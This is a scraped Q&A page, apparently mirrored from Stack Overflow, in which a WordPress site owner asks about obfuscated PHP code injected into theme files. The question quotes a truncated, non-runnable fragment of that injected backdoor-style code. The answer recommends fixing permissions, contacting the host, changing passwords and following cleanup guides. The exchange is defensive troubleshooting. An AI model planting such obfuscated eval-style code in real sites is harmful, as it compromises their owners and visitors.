{var%20f='http://v.t.sina.com.cn/share/share.php?appkey=1515056452',u=z||d.location,p=['&url=',e(u),'&title=',e(t||d.title),'&source=',e(r),'&sourceUrl=',e(l),'&content=',c||'gb2312','&pic=',e(p||'')].join('');function%20a(){if(!window.open([f,p].join(''),'mb',['toolbar=0,status=0,resizable=1,width=440,height=430,left=',(s.width-440)/2,',top=',(s.height-430)/2].join('')))u.href=[f,p].join('');};if(/Firefox/.test(navigator.userAgent))setTimeout(a,0);else%20a();})(screen,document,encodeURIComponent,'','','https://www.manongdao.com/data/attach/logo/logo.png', '推荐 贼婆χ 的问题《Wordpress hacked and php code added [closed]》','https://www.manongdao.com/q-929341.html','页面编码gb2312|utf-8默认gb2312'));){kind=link}
I got this code on an updated wordpress site.
Wordpress 3.3.1, and all plugins up to date.
Plugin list: custom-contact-forms, google-maps-for-wordpress & seo-ultimate.
Some theme files affected where CHMOD 644, Every time that I let a file with CHMOD 777 this start, but it will not affect only 777 files, it also affect 644 files.
The code is as follow:
<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioD............okBoVSjr = $eva1tYlbakBcVSir;} ?>
So, how can I prevent this, and what does the code do?
No Wordpress file should ever be 777; the maximum permissions are 755 folders, 644 files. See Hardening WordPress « WordPress Codex.
Your hosting account - probably inexpensive shared hosting - is probably the hack vector. Tell your host; possibly find a more secure host. Change all passwords. Scan your own PC.
To completely clean your WP install and hosting account, see FAQ: My site was hacked « WordPress Codex and How to completely clean your hacked wordpress installation and How to find a backdoor in a hacked WordPress.